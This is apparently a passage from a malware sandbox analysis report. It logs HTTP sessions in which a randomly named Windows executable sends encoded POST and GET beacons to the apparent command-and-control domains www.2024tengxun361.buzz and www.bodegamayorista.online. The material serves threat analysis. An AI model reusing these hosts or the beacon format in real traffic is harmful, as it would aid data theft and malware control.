                                Data Ascii: n.preventDefault(); // }); // document.documentElement.addEventListener("touchend", function (n) { // var e = new Date().getTime(); // e - o <= 300 && n.preventDefault(); // o = e;
                                Sep 23, 2024 14:40:02.265758991 CEST | 1236 | IN | Data Raw: 31 2f 6a 73 2f 63 6d 73 2d 73 70 6f 72 74 73 2e 34 37 34 31 63 64 37 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 2f 31 2f 6a 73 2f 69 6e 64 65 78 2e 36 39 39 34 66
                                Data Ascii: 1/js/cms-sports.4741cd7f.js"></script><script defer="defer" src="/1/js/index.6994fc26.js"></script><link href="/1/css/chunk-vendors.09a194bd.css" rel="stylesheet"><link href="/1/css/cms-sports.d427b88f.css" rel="stylesheet"></head> <body>
                                Sep 23, 2024 14:40:02.265764952 CEST | 104 | IN | Data Raw: 20 65 6c 65 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 69 74 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 6c 65 29 3b 0a 20 20 20 20 20 20 7d 29 3b
                                Data Ascii: ele.innerHTML = item; } document.body.appendChild(ele); }); } }</script>
                                Sep 23, 2024 14:40:02.265772104 CEST | 6 | IN | Data Raw: 0a 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                49 | 192.168.2.7 | 49753 | 154.38.114.205 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:40:07.496037960 CEST | 761 | OUT | POST /xedw/ HTTP/1.1
                                Host: www.2024tengxun361.buzz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.2024tengxun361.buzz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.2024tengxun361.buzz/xedw/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Ascii: 76=vWUaYOvBNFQF0GjqnHIlliw/phkQDZio278uir519CW1IukqmDNICnVX0m0cQHhR58V2TQKfuRQsAn8f95FqtzwSfnJjYa9z7DNwtGKf+eP8upD+pXHRZhjkdN6UbiCKJtVxGU/dsMoE2Vwkzu1VnZwDMpVr5WSkOnodCGSQz/0m76uPqbQZV3Z43d2v9t8mvSFz0EFHLnAP71PCOw==
                                Sep 23, 2024 14:40:08.418097019 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:40:08 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Sep 23, 2024 14:40:08.418113947 CEST | 962 | IN | Data Raw: 61 27 08 da 00 a0 6e 41 dd 78 6d 1b 88 06 4d 88 7c 73 25 50 7f 10 b5 86 e4 25 49 58 a5 82 09 d4 a1 45 5e 4d 22 ad 65 a6 27 64 24 11 e7 c1 08 8d d0 de a8 5c 22 39 8f c8 a3 93 13 5c ff 1f 0d 46 87 8f 3b 7e 3a 80 09 ae c9 b1 c8 85 0c 1e a6 69 ea 16


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                50 | 192.168.2.7 | 49754 | 154.38.114.205 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:40:10.033812046 CEST | 781 | OUT | POST /xedw/ HTTP/1.1
                                Host: www.2024tengxun361.buzz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.2024tengxun361.buzz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.2024tengxun361.buzz/xedw/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Ascii: 76=vWUaYOvBNFQF7HTqkkwl0Sw8shkQJ5jv27guivIq8wy1IPUqnBpIHnVXs20Tenha58YBTUOfuV4sAiAf9K9prjwcUHJtV69z7DNwtGu1+eX8vZT+q0fWahjjaN6UfiCGJtUUGRnzsOQE2X4kzcNStZwFCJV000LWKlcYa33JxYw46Mztw5c1LmhDzfSZqLhTtTBr5mxmUQll2nuGYAKp+j3cbNMI5erB6O0ja2E=
                                Sep 23, 2024 14:40:11.121341944 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:40:10 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Sep 23, 2024 14:40:11.121361971 CEST | 962 | IN | Data Raw: 61 27 08 da 00 a0 6e 41 dd 78 6d 1b 88 06 4d 88 7c 73 25 50 7f 10 b5 86 e4 25 49 58 a5 82 09 d4 a1 45 5e 4d 22 ad 65 a6 27 64 24 11 e7 c1 08 8d d0 de a8 5c 22 39 8f c8 a3 93 13 5c ff 1f 0d 46 87 8f 3b 7e 3a 80 09 ae c9 b1 c8 85 0c 1e a6 69 ea 16


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                51 | 192.168.2.7 | 49755 | 154.38.114.205 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:40:12.581899881 CEST | 1794 | OUT | POST /xedw/ HTTP/1.1
                                Host: www.2024tengxun361.buzz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.2024tengxun361.buzz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.2024tengxun361.buzz/xedw/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Ascii: 76=vWUaYOvBNFQF7HTqkkwl0Sw8shkQJ5jv27guivIq8w61IdwqlhVIEnVXym0Qenh958ANTRXquXAsAA4fqr9pijwcbnJgYa9m7HR8tG+1+eX8vbb+8XHWchjkdN6mbiDZJtdpGRTNs/wE13IkxP1ShZwHFJUh003NKlAua3Smxf847oCcvagwRXF66v39nY1UgDdR2lhpKyVTxxDOV1Sp+wzfdfMwwI2RmcgVbi8whgdOo+CTyChiiNMfx23X1Qm/1cbW4sI17PXoZ7X2sRGHkUd/+LrD9dhBEq2JQo6F6GUJK/kyS6wxxlOPd4K+DJlpdzgiYCuMoinwbXnGWe81Uyl0meG986PV15UhmLpP8qAOgp3ZexwvkMt8yu3hxCrP2kSHuFRyIq2/Pc8aZ55i+dm5fZyHNACq7zOApCSiQ81v/2Y9FhzLCql7fC6uIS6gKY6cS6ivFVetyMdDUxki0MIGCixwOCGbjU4iA7YUrTnxzpbMRaKwU0OaPY8axthXoUA3WULLBOGW3x3Mon+RqueSbPzgvHjceaxHAOJCWjaF2VI2ZEFbnIChaHmFZz6mCzwqXGyrpc1QVfxrsxlVx07/NfC2ATG3F23nj3tZyg9YqXvqZ5xIouqibGd9JL/XO+ACN+qk5fOyV/06D2SVu55hpa6Y8vR1WHhW9kOZ/Ryy2ayTwCmKkWWGVuBVlI/n90RWJ2H5eBXmJAEduBO2vDeBe6QOew5AwhEiM1i2S2Tkd3XDLghwxYGpAJULJnkJAwLbONhR4xf+Zowh8VpwdRzVp+7eAjxDZPD+6ymkzosUsF4bE9eFw0dZ0gqy9Z+taKpo34MIaFVZWffxlWvNtzWB2zugLH2t8jH+bkWUZpHDsn6CwTha0nCy6EFco73v26BPMExZh0bNTFl57LHReElchb42VSG75Tou8N8fEjGcAtxGo+izQtFGvbPf0FzPfR+kSdR7AaOKce1s3ls6CPT6k5NUOPyw4/OjvUyRps5/vHZEh [TRUNCATED]
                                Sep 23, 2024 14:40:14.269282103 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:40:13 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Data Raw: 37 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 5b 8f dc b6 15 7e f7 af 60 64 04 b0 5b 6a 6e 7b 97 66 16 6d dd a6 7e e8 25 40 dc 87 00 7d a1 24 6a 44 af 44 ca 24 35 3b e3 41 81 be 14 05 0a 04 41 00 17 6d 91 de f2 50 20 2f ed 3e 15 30 60 a4 fd 33 bb ad f7 5f f4 90 ba 71 76 66 e3 dd 74 ed 5d 49 14 79 ae df f9 0e c5 e9 7b df ff e9 93 67 1f 7f f8 03 94 e9 22 3f 7d 30 6d 2f 94 24 a7 0f 10 fc 4c 0b aa 09 bc d5 a5 4f 5f 54 6c 31 f3 9e 08 ae 29 d7 fe b3 55 49 3d 14 d7 4f 33 4f d3 a5 1e 9a e5 61 9c 11 a9 a8 9e fd ec d9 07 fe b1 d7 88 d1 4c e7 f4 f4 ea d3 cf fe fb ea 2f d7 af fe f0 f6 e2 62 3a ac c7 1c 35 9c 14 74 e6 49 11 09 ad 1c d1 5c 30 9e d0 25 e6 22 15 79 2e ce 3d 34 74 8d ab 57 2d 18 3d 2f 85 d4 ce ba 73 96 e8 6c 96 d0 05 8b a9 6f 1f 30 62 9c 69 46 72 5f c5 24 a7 b3 31 46 95 a2 d2 3e 91 08 06 b8 68 0d ce 19 3f 43 92 e6 33 4f 65 20 36 ae 34 62 e0 ac 87 32 49 d3 99 37 24 0a 7c 54 43 56 cc 87 29 01 0d 82 0f e0 4f 6f 9a d2 2b 70 d8 3a 67 7e be 85 d6 7e 21 5e fa 91 58 fa 8a bd 64 7c 1e 44 42 26 a0 1b 46 [TRUNCATED]
                                Data Ascii: 7b6X[~`d[jn{fm~%@}$jDD$5;AAmP />0`3_qvft]Iy{g"?}0m/$LO_Tl1)UI=O3OaL/b:5tI\0%"y.=4tW-=/slo0biFr_$1F>h?C3Oe 64b2I7$|TCV)Oo+p:g~~!^Xd|DB&FBFgLv_tMq$Np,4B1&8>pvK">{QMq))&Q$1II1X$'4I1-0xW,JHQbU<JKXUxA$08Iq<TCAxN'8&fc"5s0G1 yp[%2((0' r5X&U^02g<%o349$gsDDQ&H|f$pltO_7:a*s4uhEaq~F<dl-L>IWJ3BHKYK<h}#LiXe]J>#KS+u*2n}tr0O:_YrW]`$'h9sIV`B"%Wj@~B+{x{$H{0cAV"c2_oWo>`$W>KLBx PwBauh2M46:a6ecr8Rd-IYByuG>~)pA [TRUNCATED]
                                Sep 23, 2024 14:40:14.269383907 CEST | 962 | IN | Data Raw: 61 27 08 da 00 a0 6e 41 dd 78 6d 1b 88 06 4d 88 7c 73 25 50 7f 10 b5 86 e4 25 49 58 a5 82 09 d4 a1 45 5e 4d 22 ad 65 a6 27 64 24 11 e7 c1 08 8d d0 de a8 5c 22 39 8f c8 a3 93 13 5c ff 1f 0d 46 87 8f 3b 7e 3a 80 09 ae c9 b1 c8 85 0c 1e a6 69 ea 16
                                Data Ascii: a'nAxmM|s%P%IXE^M"e'd$\"9\F;~:iy_WfA+M:8}O&fQ3bgc3'jGBv`8Z[f(t&vpoH-6)5D!lx9h96{4T6WgoQbKg@j9:XoPJ
                                Sep 23, 2024 14:40:14.269721031 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:40:13 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Data Raw: 37 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 5b 8f dc b6 15 7e f7 af 60 64 04 b0 5b 6a 6e 7b 97 66 16 6d dd a6 7e e8 25 40 dc 87 00 7d a1 24 6a 44 af 44 ca 24 35 3b e3 41 81 be 14 05 0a 04 41 00 17 6d 91 de f2 50 20 2f ed 3e 15 30 60 a4 fd 33 bb ad f7 5f f4 90 ba 71 76 66 e3 dd 74 ed 5d 49 14 79 ae df f9 0e c5 e9 7b df ff e9 93 67 1f 7f f8 03 94 e9 22 3f 7d 30 6d 2f 94 24 a7 0f 10 fc 4c 0b aa 09 bc d5 a5 4f 5f 54 6c 31 f3 9e 08 ae 29 d7 fe b3 55 49 3d 14 d7 4f 33 4f d3 a5 1e 9a e5 61 9c 11 a9 a8 9e fd ec d9 07 fe b1 d7 88 d1 4c e7 f4 f4 ea d3 cf fe fb ea 2f d7 af fe f0 f6 e2 62 3a ac c7 1c 35 9c 14 74 e6 49 11 09 ad 1c d1 5c 30 9e d0 25 e6 22 15 79 2e ce 3d 34 74 8d ab 57 2d 18 3d 2f 85 d4 ce ba 73 96 e8 6c 96 d0 05 8b a9 6f 1f 30 62 9c 69 46 72 5f c5 24 a7 b3 31 46 95 a2 d2 3e 91 08 06 b8 68 0d ce 19 3f 43 92 e6 33 4f 65 20 36 ae 34 62 e0 ac 87 32 49 d3 99 37 24 0a 7c 54 43 56 cc 87 29 01 0d 82 0f e0 4f 6f 9a d2 2b 70 d8 3a 67 7e be 85 d6 7e 21 5e fa 91 58 fa 8a bd 64 7c 1e 44 42 26 a0 1b 46 [TRUNCATED]
                                Data Ascii: 7b6X[~`d[jn{fm~%@}$jDD$5;AAmP />0`3_qvft]Iy{g"?}0m/$LO_Tl1)UI=O3OaL/b:5tI\0%"y.=4tW-=/slo0biFr_$1F>h?C3Oe 64b2I7$|TCV)Oo+p:g~~!^Xd|DB&FBFgLv_tMq$Np,4B1&8>pvK">{QMq))&Q$1II1X$'4I1-0xW,JHQbU<JKXUxA$08Iq<TCAxN'8&fc"5s0G1 yp[%2((0' r5X&U^02g<%o349$gsDDQ&H|f$pltO_7:a*s4uhEaq~F<dl-L>IWJ3BHKYK<h}#LiXe]J>#KS+u*2n}tr0O:_YrW]`$'h9sIV`B"%Wj@~B+{x{$H{0cAV"c2_oWo>`$W>KLBx PwBauh2M46:a6ecr8Rd-IYByuG>~)pA [TRUNCATED]
                                Sep 23, 2024 14:40:14.269926071 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:40:13 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Data Raw: 37 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 5b 8f dc b6 15 7e f7 af 60 64 04 b0 5b 6a 6e 7b 97 66 16 6d dd a6 7e e8 25 40 dc 87 00 7d a1 24 6a 44 af 44 ca 24 35 3b e3 41 81 be 14 05 0a 04 41 00 17 6d 91 de f2 50 20 2f ed 3e 15 30 60 a4 fd 33 bb ad f7 5f f4 90 ba 71 76 66 e3 dd 74 ed 5d 49 14 79 ae df f9 0e c5 e9 7b df ff e9 93 67 1f 7f f8 03 94 e9 22 3f 7d 30 6d 2f 94 24 a7 0f 10 fc 4c 0b aa 09 bc d5 a5 4f 5f 54 6c 31 f3 9e 08 ae 29 d7 fe b3 55 49 3d 14 d7 4f 33 4f d3 a5 1e 9a e5 61 9c 11 a9 a8 9e fd ec d9 07 fe b1 d7 88 d1 4c e7 f4 f4 ea d3 cf fe fb ea 2f d7 af fe f0 f6 e2 62 3a ac c7 1c 35 9c 14 74 e6 49 11 09 ad 1c d1 5c 30 9e d0 25 e6 22 15 79 2e ce 3d 34 74 8d ab 57 2d 18 3d 2f 85 d4 ce ba 73 96 e8 6c 96 d0 05 8b a9 6f 1f 30 62 9c 69 46 72 5f c5 24 a7 b3 31 46 95 a2 d2 3e 91 08 06 b8 68 0d ce 19 3f 43 92 e6 33 4f 65 20 36 ae 34 62 e0 ac 87 32 49 d3 99 37 24 0a 7c 54 43 56 cc 87 29 01 0d 82 0f e0 4f 6f 9a d2 2b 70 d8 3a 67 7e be 85 d6 7e 21 5e fa 91 58 fa 8a bd 64 7c 1e 44 42 26 a0 1b 46 [TRUNCATED]
                                Data Ascii: 7b6X[~`d[jn{fm~%@}$jDD$5;AAmP />0`3_qvft]Iy{g"?}0m/$LO_Tl1)UI=O3OaL/b:5tI\0%"y.=4tW-=/slo0biFr_$1F>h?C3Oe 64b2I7$|TCV)Oo+p:g~~!^Xd|DB&FBFgLv_tMq$Np,4B1&8>pvK">{QMq))&Q$1II1X$'4I1-0xW,JHQbU<JKXUxA$08Iq<TCAxN'8&fc"5s0G1 yp[%2((0' r5X&U^02g<%o349$gsDDQ&H|f$pltO_7:a*s4uhEaq~F<dl-L>IWJ3BHKYK<h}#LiXe]J>#KS+u*2n}tr0O:_YrW]`$'h9sIV`B"%Wj@~B+{x{$H{0cAV"c2_oWo>`$W>KLBx PwBauh2M46:a6ecr8Rd-IYByuG>~)pA [TRUNCATED]


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                52 | 192.168.2.7 | 49756 | 154.38.114.205 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:40:15.398166895 CEST | 484 | OUT | GET /xedw/?mtJD_=fvdlJ2L&76=iU86b+DQDkc5+HCYi3wksyID7wIiKcPt1qIOrYUg5TrYQuRHlXYNPzVksVl/dHByk+JFXw+Aj1EfBi5c9qhjsEIOS1JRVa1wxHxBhUP989bRn8j6x1DUcRzlbseaRz6IPahZbjf8tblS HTTP/1.1
                                Host: www.2024tengxun361.buzz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:40:16.345779896 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:40:16 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Data Raw: 31 34 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f [TRUNCATED]
                                Data Ascii: 1411<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> <title></title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <link rel="shortcut icon" href="/assets/img/favicon.ico" /> <style> * {-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;} html,body,div,span,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,abbr,address,cite,code,del,dfn,em,img,ins,kbd,q,samp,small,strong,sub,sup,var,b,i,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,caption,article,aside,canvas,details,figcaption,figure,footer,header,hgroup,menu,nav,section,summary,time,mark,audio,video {margin:0;padding:0;border:0;outline:0;vertical-align:baseline;background:transparent;} article,aside,details,figcaption,figure,footer,header,hgroup,nav,section {display:block;} html {font-size:16px;line-height:24px;wi [TRUNCATED]
                                Sep 23, 2024 14:40:16.345798016 CEST | 1236 | IN | Data Raw: 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 73 63 72 6f 6c 6c 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 7d 0a 20 20 20
                                Data Ascii: ze-adjust:100%;-ms-text-size-adjust:100%;overflow-y:scroll;overflow-x:hidden;} img {vertical-align:middle;max-width:100%;height:auto;border:0;-ms-interpolation-mode:bicubic;} body {min-height:100%;background:#f4f6f8;text-render
                                Sep 23, 2024 14:40:16.345805883 CEST | 1236 | IN | Data Raw: 65 72 2d 73 70 61 63 69 6e 67 3a 2d 31 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 63 6f 6c 6f 72 3a 23 37 37 37 3b 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 77 72 61 70 70 65 72 20 2e 73 75 62 68 65
                                Data Ascii: er-spacing:-1px;margin-bottom:20px;color:#777;} .error-page-wrapper .subheader {transition:color .2s linear;font-size:32px;line-height:46px;color:#494949;} .error-page-wrapper .hr {height:1px;background-color:#eee;width:80%;max
                                Sep 23, 2024 14:40:16.346045017 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 77 72 61 70 70 65 72 20 7b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 35 25 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d 77 72 61 70 70 65 72 20 2e 63 6f
                                Data Ascii: .error-page-wrapper {padding:30px 5%;} .error-page-wrapper .content-container {padding:37px;position:static;left:0;margin-top:0;margin-left:0;} .error-page-wrapper .head-line {font-size:36px;} .error
                                Sep 23, 2024 14:40:16.346060038 CEST | 394 | IN | Data Raw: 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 e6 a8 a1 e5 9d 97 e4 b8 8d e5 ad 98 e5 9c a8 3a 78 65 64 77 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63
                                Data Ascii: div> <div class="subheader"> :xedw </div> <div class="hr"></div> <div class="context"> <p> </p> </div> <div class="buttons-container">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                53 | 192.168.2.7 | 49757 | 84.32.84.32 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:40:21.475891113 CEST | 770 | OUT | POST /8xob/ HTTP/1.1
                                Host: www.bodegamayorista.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.bodegamayorista.online
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.bodegamayorista.online/8xob/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 4e 33 51 50 42 50 30 43 61 32 34 59 63 43 75 42 34 46 6e 43 54 33 6b 61 44 47 47 55 46 52 43 6f 44 4c 61 32 36 6d 47 4f 63 4f 31 44 50 68 58 4f 47 51 35 5a 6b 69 47 38 56 32 6d 43 2b 79 58 54 58 51 67 44 72 69 76 69 7a 51 36 59 65 67 6a 77 69 38 6f 76 64 6d 6f 32 56 2f 6f 5a 4d 48 4f 73 37 30 43 4d 50 7a 51 6c 53 68 50 48 54 33 39 35 35 7a 70 65 39 74 55 47 62 37 66 51 77 57 4f 52 4c 2f 6e 62 43 56 51 4a 42 70 32 4a 6d 75 5a 7a 2b 46 78 67 59 7a 4a 31 54 37 41 6a 42 6f 76 57 71 74 2f 6c 77 59 45 6c 4c 73 6d 4e 78 74 4b 77 61 51 41 6c 6a 37 39 5a 70 4c 42 46 68 49 56 6b 78 59 6c 4c 46 59 4c 52 66 4e 63 73 32 34 71 48 39 67 3d 3d
                                Data Ascii: 76=N3QPBP0Ca24YcCuB4FnCT3kaDGGUFRCoDLa26mGOcO1DPhXOGQ5ZkiG8V2mC+yXTXQgDrivizQ6Yegjwi8ovdmo2V/oZMHOs70CMPzQlShPHT3955zpe9tUGb7fQwWORL/nbCVQJBp2JmuZz+FxgYzJ1T7AjBovWqt/lwYElLsmNxtKwaQAlj79ZpLBFhIVkxYlLFYLRfNcs24qH9g==


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                54 | 192.168.2.7 | 49758 | 84.32.84.32 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:40:24.023880005 CEST | 790 | OUT | POST /8xob/ HTTP/1.1
                                Host: www.bodegamayorista.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.bodegamayorista.online
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.bodegamayorista.online/8xob/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 4e 33 51 50 42 50 30 43 61 32 34 59 54 43 65 42 30 47 50 43 66 48 6b 5a 61 32 47 55 4d 78 44 6a 44 4c 65 32 36 6e 43 65 63 38 52 44 50 42 48 4f 48 52 35 5a 6a 69 47 38 64 57 6d 39 68 69 57 2b 58 51 39 2b 72 6a 6a 69 7a 55 61 59 65 68 54 77 69 50 77 6f 63 32 6f 77 54 2f 6f 68 52 58 4f 73 37 30 43 4d 50 33 41 4c 53 69 2f 48 53 48 74 35 35 57 46 5a 2b 74 55 46 63 37 66 51 68 47 4f 56 4c 2f 6e 70 43 52 51 6a 42 72 2b 4a 6d 76 70 7a 2b 51 64 6a 52 7a 4a 7a 4f 4c 41 74 42 4e 43 73 6c 4f 50 68 78 5a 34 48 42 64 7a 6d 39 37 58 53 41 79 4d 4a 39 71 46 69 74 4a 6c 7a 32 75 49 52 7a 5a 68 54 49 36 2f 77 41 36 35 47 37 71 4c 44 72 61 5a 47 49 53 63 36 43 35 41 77 59 32 30 5a 44 61 5a 32 69 71 51 3d
